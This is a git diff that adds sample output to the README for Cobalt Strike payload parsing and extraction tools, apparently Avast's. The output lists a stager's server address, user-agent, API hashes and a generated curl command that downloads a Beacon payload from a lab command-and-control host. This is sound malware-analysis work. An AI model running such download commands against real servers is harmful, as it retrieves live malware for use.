diff --git a/CobaltStrike/payload_tools/README.md b/CobaltStrike/payload_tools/README.md
index 1697a42..db76d84 100644
--- a/CobaltStrike/payload_tools/README.md
+++ b/CobaltStrike/payload_tools/README.md
@@ -14,6 +14,46 @@ Example:
 cs_payload_parser.py memdump.bin
 cs_payload_parser.py c:\cs_payloads\
 ```
+Output:
+```
+.log
+```
+```
+--------------------------------------------------------------------------------
+Filename: fhttps_raw_x86
+--------------------------------------------------------------------------------
+Architecture: x86
+Payload type: HTTPS stager
+Payload start: 0x0000
+Customer ID: 0x12345678 | 305419896
+--------------------------------------------------------------------------------
+Request detail:
+Address: 192.168.42.2
+Port: 444
+Query: /AYhZ (Beacon_x86 checksum)
+--------------------------------------------------------------------------------
+Request header:
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;PTBR)
+--------------------------------------------------------------------------------
+Curl download command:
+curl -o beacon_x86.bin -H "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;PTBR)" https://192.168.42.2:444/AYhZ
+--------------------------------------------------------------------------------
+Payload API list:
+Offset | Hash value | API name
+0x009c | 0x0726774c | kernel32.dll_LoadLibraryA
+0x00af | 0xa779563a | wininet.dll_InternetOpenA
+0x00cb | 0xc69f8957 | wininet.dll_InternetConnectA
+0x00e7 | 0x3b2e55eb | wininet.dll_HttpOpenRequestA
+0x0100 | 0x869e4675 | wininet.dll_InternetSetOptionA
+0x0110 | 0x7b18062d | wininet.dll_HttpSendRequestA
+0x0129 | 0x5de2c5aa | kernel32.dll_GetLastError
+0x0132 | 0x315e2145 | user32.dll_GetDesktopWindow
+0x0141 | 0x0be057b7 | wininet.dll_InternetErrorDlg
+0x02e9 | 0x56a2b5f0 | kernel32.dll_ExitProcess
+0x02fd | 0xe553a458 | kernel32.dll_VirtualAlloc
+0x0318 | 0xe2899612 | wininet.dll_InternetReadFile
+--------------------------------------------------------------------------------
+```
 ## cs_payload_extractor.py
@@ -27,4 +67,56 @@ Example:
 ```
 cs_payload_extractor.py memdump.bin
 cs_payload_extractor.py c:\cs_payloads\
-```
\ No newline at end of file
+```
+Output:
+```
+_payload.bin
+_payload.bin.log
+```
+```
+--------------------------------------------------------------------------------
+CS Payload extractor v1.00 Avast Software s.r.o
+--------------------------------------------------------------------------------
+[*] Extracting file..
+--------------------------------------------------------------------------------
+Filename: fhttps_exe_x86
+Payload type: xored_payload
+--------------------------------------------------------------------------------
+Saved as: fhttps_exe_x86_payload.bin
+--------------------------------------------------------------------------------
+[*] Parsing file..
+--------------------------------------------------------------------------------
+Filename: fhttps_exe_x86_payload.bin
+--------------------------------------------------------------------------------
+Architecture: x86
+Payload type: HTTPS stager
+Payload start: 0x0000
+Customer ID: 0x12345678 | 305419896
+--------------------------------------------------------------------------------
+Request detail:
+Address: 192.168.42.2
+Port: 444
+Query: /IZVc (Beacon_x86 checksum)
+--------------------------------------------------------------------------------
+Request header:
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MASP)
+--------------------------------------------------------------------------------
+Curl download command:
+curl -o beacon_x86.bin -H "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MASP)" https://192.168.42.2:444/IZVc
+--------------------------------------------------------------------------------
+Payload API list:
+Offset | Hash value | API name
+0x009c | 0x0726774c | kernel32.dll_LoadLibraryA
+0x00af | 0xa779563a | wininet.dll_InternetOpenA
+0x00cb | 0xc69f8957 | wininet.dll_InternetConnectA
+0x00e7 | 0x3b2e55eb | wininet.dll_HttpOpenRequestA
+0x0100 | 0x869e4675 | wininet.dll_InternetSetOptionA
+0x0110 | 0x7b18062d | wininet.dll_HttpSendRequestA
+0x0129 | 0x5de2c5aa | kernel32.dll_GetLastError
+0x0132 | 0x315e2145 | user32.dll_GetDesktopWindow
+0x0141 | 0x0be057b7 | wininet.dll_InternetErrorDlg
+0x02e9 | 0x56a2b5f0 | kernel32.dll_ExitProcess
+0x02fd | 0xe553a458 | kernel32.dll_VirtualAlloc
+0x0318 | 0xe2899612 | wininet.dll_InternetReadFile
+--------------------------------------------------------------------------------
+```